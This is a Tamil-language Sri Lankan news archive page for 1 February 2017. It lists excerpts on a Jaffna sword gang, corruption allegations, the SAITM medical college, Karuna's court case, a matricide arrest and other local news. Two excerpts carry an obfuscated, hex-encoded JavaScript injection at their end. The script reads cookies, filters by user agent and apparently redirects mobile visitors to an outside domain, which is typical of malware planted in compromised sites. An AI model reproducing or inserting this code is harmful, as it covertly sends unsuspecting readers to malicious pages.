முகப்புஎம்மை பற்றிவிளம்பரம்செய்திகள்தொடர்பு

Day

February 1, 2017

யாழில். வாள்வெட்டுக்குழு:புருவத்தை உயர்த்துகிறது அரசு

யாழில் இயங்கிவரும் வாள்வெட்டுக் குழுக்களால் தேசிய பாதுகாப்புக்கு எவ்வித அச்சுறுத்தலும் ஏற்படவில்லை என்று பாதுகாப்பு இராஜாங்க அமைச்சர் ருவான் விஜேவர்தன தெரிவித்தார். கம்பஹா பகுதியில் இன்று நடைபெற்ற நிகழ்வொன்றில் கலந்துகொண்ட அவரிடம், யாழில். இடம்பெற்றுவரும் வாள்வெட்டு சம்பவங்கள் தொடர்பில் ஊடகவியலாளர்கள் கேள்வி எழுப்பினர். இதற்கு பதிலளித்த அவர், “ வடக்கிலோ தெற்கிலோ சட்டத்தை கையிலெடுப்பதற்கு எவருக்கும் அனுமதி வழங்கமாட்டோம். மேற்படி குழுவால் தேசிய பாதுகாப்புக்கு அச்சுறுத்தல் இல்லை. எனினும், இது குறித்து விழிப்பாக இருக்கிறோம்’’ என்றார்.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])==...
Read More

ஊழல் அம்பலமானால் அமைச்சுப் பதவியை துறப்பேன்

தனக்கு எதிராக முன்வைக்கப்பட்டுள்ள குற்றச்சாட்டு நிரூபிக்கப்பட்டால் அமைச்சுப் பதவியை துறந்து அரசியலிலிருந்து ஒதுங்குவதற்கு தயார் என்று அமைச்சர் பி. ஹரிசன் இன்று தெரிவித்தார். நெல் விற்பனை நிலையத்தில் இடம்பெற்றதாக கூறப்படும் மோசடியை அடிப்படையாகக் கொண்டு அமைச்சருக்கு எதிராக சி.ஐ.டி., இலஞ்ச, ஊழல் விசாரணை ஆணைக்குழு ஆகியவற்றில் மஹிந்த அணியினர் இன்று முறைப்பாடு தாக்கல் செய்தனர். இதற்கு பதிலளிக்கும் வகையில் கருத்து வெளியிட்ட அமைச்சர் கூறியவை வருமாறு:- எவ்வித அடிப்படையுமின்றியே முறைப்பாடு செய்யப்பட்டுள்ளது. அது பரவாயில்லை. குற்றச்சாட்டு நிரூபிக்கப்பட்டால்...
Read More

சைட்டத்துக்கு சாவுமணி அடிப்போம்: எச்சரிக்கிறது ஜே.வி.பி.

மாலபே தனியார் மருத்துவக் கல்லூரிக்கு ( சைட்டம்) சட்ட அங்கீகாரத்தை வழங்குவதற்கு ஒருபோதும் இடமளிக்கப்போவதில்லை என்றும், இந்த விவகாரம் சம்பந்தமாக போராட்டம் நடத்தப்படும் என்றும் ஜே.வி.பி. தெரிவித்தது. ஜே.வி.பியின் ஊடகவியலாளர்  மாநாடு இன்று காலை பத்தரமுல்லையிலுள்ள அக்கட்சியின் தலைமையகத்தில் நடைபெற்றது. இதில் கலந்துகொண்டு உரையாற்றுகையிலேயே பிமல் ரத்னாயக்க எம்.பி. மேற்கண்டவாறு தெரிவித்தார். நாட்டையும் மாணவர்களையும் ஏமாற்றும் நிறுவனத்திற்கு சட்ட அங்கீகாரத்தை வழங்கும் வகையிலான தீர்ப்பை ஏற்றுக்கொள்ள முடியாது. அங்கு பயின்ற மாணவர்களை மருத்துவச் சபையில் பதிவுசெய்யவும் முடியாது.மருத்துவ...
Read More

தமிழ் பாடசாலைகளின் அபிவிருத்தி கண்டியில் துளிர்விட ஆரம்பித்துள்ளது

கண்டி மாவட்டத்தின் முடக்கி விடப்பட்டிருந்த தமிழ் பாடசாலைகளின் அபிவிருத்தி இன்று துளிர்விட ஆரம்பித்திருக்கின்றது என தமிழ் முற்போக்கு கூட்டணியின் கண்டி மாவட்ட பாராளுமன்ற உறுப்பினர் வெலு குமார் தெரிவித்துள்ளார். கடந்த பல வருடங்களாக கண்டி மாவட்டத்தில் தமிழ் பாடசாலைகளின் அபிவிருத்தி முடக்கி விடப்பட்டிருந்தது. எனினும் இன்று புதிய அரசாங்கத்தில் அவை மீள துளிர்விட ஆரம்பித்திருக்கின்றன. அரசாங்கத்தின் புதிய பாடசாலை அபிவிருத்தி திட்டமான ‘கிட்டிய பாடசாலை நல்ல பாடசாலை’ என்ற திட்டத்திலே பல தமிழ் பாடசாலைகள் உள்ளப்பட்டிருக்கின்றன. அத்தோடு...
Read More

சிக்குவாரா கருணா? விசாரணைகள் நிறைவு!

முன்னாள் பிரதி அமைச்சர் விநாயகமூர்த்தி முரளிதரன் எனப்படும் கருணா அம்மானுக்கு எதிராக தாக்கல் செய்யப்பட்ட வழக்கு குறித்த விசாரணைகள் நிறைவடைந்துள்ளதாக, பொலிஸ் நிதி குற்ற விசாரணைப் பிரிவு நீதிமன்றத்தில் தெரிவித்துள்ளது. இதன்படி, இந்த விசாரணை அறிக்கை சட்டமா அதிபரின் ஆலோசனையைப் பெற அனுப்பி வைக்கப்பட்டுள்ளதாகவும் அவர்கள் இதன்போது சுட்டிக்காட்டியுள்ளனர். அரச வாகனங்களை துஷ்பிரயோகம் செய்ததாக கூறப்படும் சம்பவம் தொடர்பில் கருணா அம்மானுக்கு எதிராக தாக்கல் செய்யப்பட்ட, வழக்கு கொழும்பு நீதவான் நீதிமன்றத்தில் இன்று விசாரணைக்கு எடுத்துக் கொள்ளப்பட்டது....
Read More

மஹிந்த எதிர்த்தால் தீர்வு கிடைக்காது; சம்பந்தன் தெரிவிப்பு

தேசிய இனப்பிரச்சினைக்கு நிரந்தரமாக அரசியல் தீர்வு காண்பதற்கு முன்னாள் ஜனாதிபதி மஹிந்த ராஜபக்சவின் ஒத்துழைப்பும் அவசியம் என்று தமிழ்த் தேசியக் கூட்டமைப்பின் தலைவரும் எதிர்க்கட்சித் தலைவருமான இரா. சம்பந்தன் தெரிவித்தார். களுவாஞ்சிகுடி ஆதார வைத்தியசாலையின் புதிய கட்டிடத்தொகுதி திறப்புவிழா இன்று நடைபெற்றது. இதில் கலந்துகொண்டு உரையாற்றுகையிலேயே அவர் இதனை தெரிவித்தார். “ புதிய அரசியல் சாசனத்தை உருவாக்கவதற்காக அர்ப்பணிப்புடன் செயற்பட்டு வருகின்றோம் இதனுடாக ஒரு நிரந்தரமான நீதியான தீர்வினைக் கண்டு இந்த நாட்டில் வாழ்கின்ற மக்கள் மத்தியில்...
Read More

86 பெண்களை மணந்து 136 குழந்தைகளுக்கு தந்தையான மதகுரு மரணம்

ஆப்ரிக்க நாடான நைஜீரியா வில், 86 பெண்களை திருமணம் செய்து, 130 குழந்தைகளுக்கு தந்தையான, மதகுரு, 93வது வயதில் காலமானார். நைஜீரியாவில் இருந்து வெளிவரும் முன்னணி பத்திரிகையில் இடம்பெற்ற செய்தி விபரம்:பிடா மாகாணத்தைச் சேர்ந்த, மதகுரு, முகம்மது அபுபக்கர்பெல்லோ மஸாபா, 93. இவர், 86 பெண்களை திருமணம் செய்தவர். இவர்கள் மூலம், 130 குழந்தைகளுக்கு, தந்தை ஆனார், மஸாபா. இந்நிலையில், முதுமையால், மஸாபா சமீபத்தில் காலமானார். மஸாபாவின் மறைவு, அவர் மனைவியர், குழந்தைகளை கண்ணீர் கடலில் ஆழ்த்தி...
Read More

எதியோப்பியாவுடன் உறவை பலப்படுத்துகிறது இலங்கை: சிறப்பு பிரதிநிதியாக மங்கள அனுப்பிவைப்பு

வெளிவிவகார அமைச்சர் மங்கள சமரவீர விரைவில் எதியோப்பியாவுக்கு பயணம் மேற்கொள்ளவுள்ளார். ஆபிரிக்க நாடான எதியோப்பியாவுடன் இலங்கை அரசு சில உடன்படிக்கைகளில் கைச்சாத்திடவுள்ளது. வெளி விவகார அமைச்சரின் குறித்த பயணத்தின்போது இவை கைச்சாத்திடப்படவுள்ளது. அந்தவகையில்,நீடித்து நிலைக்கக் கூடியதும் நிலையானதுமான அடிப்படை மீது சமத்துவம் மற்றும் பரஸ்பர அனுகூலம் என்ற கோட்பாட்டின் அடிப்படையில் அரசியல், பொருளாதார, தொழில்நுட்ப மற்றும் கலாசார ஒத்துழைப்பு ஆகியவற்றை ஊக்குவிப்பதையும், வலுப்படுத்துவதையும் நோக்காகக் கொண்டு, இலங்கைக்‌கும், எதியோப்பாவுக்குமிடையில்  புரிந்தணர்வு உடன்படிக்கை கைச்சாத்திட அமைச்சரை அனுமதி வழங்கியுள்ளது....
Read More

மத்திய மாகாணத்தில் 200 பாதைகள் புனரமைப்பு: ஒப்புதல் வழங்கியது அமைச்சரவை

மலைநாடு வலயத்தில் சிறு தேயிலைத் தோட்ட உரிமையாளர்களுக்காக விசேட கருத்திட்ட முன்மொழிவுகளை நடைமுறைப்படுத்துவதற்கு அமைச்சரவை அனுமதிவழங்கியுள்ளது. சிறு தேயிலைத் தோட்ட உரிமையாளர்களால், இலங்கையில் தேயிலை உற்பத்திக்காக 68 சதவீத பங்களிப்பு வழங்கப்பட்டுள்ளதுடன், நாட்டில் மொத்த தேயிலை நிலப்பரப்பின் 73வீதம் சிறு தேயிலைத் தோட்ட உரிமையாளர்களுக்கு சொந்தமானதாக இருக்கின்றது. சிறு தேயிலைத் தோட்ட உரிமையாளர்கள் எதிர்நோக்கும் பிரச்சினைகளுக்கு தீர்வு பெற்றுக் கொடுக்கும் நோக்கில் குறித்த தோட்டங்களுக்கான கிராம பிரவேச பாதைகளில் காணப்படுகின்ற தடைகள் அகற்றி, போக்குவரத்திற்கு பொருத்தமான வகையில்...
Read More

தாயைக் கொன்ற மகன் கைது

கேகாலை – பிங்தெனிய பகுதியில் கூரிய ஆயுதத்தால் தாக்கி தன் தாயைக் கொன்ற 58 வயதான நபரொருவர் கைதுசெய்யப்பட்டுள்ளார். சம்பவத்தில் 86 வயதான மூதாட்டி ஒருவரே பலியாகியுள்ளதாக பொலிஸார் குறிப்பிட்டுள்ளனர். காணிப் பிரச்சினை ஒன்று தொடர்பிலேயே இந்த கொலை இடம்பெற்றுள்ளதாக தெரியவந்துள்ளது.var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new...
Read More
error: Content is protected !!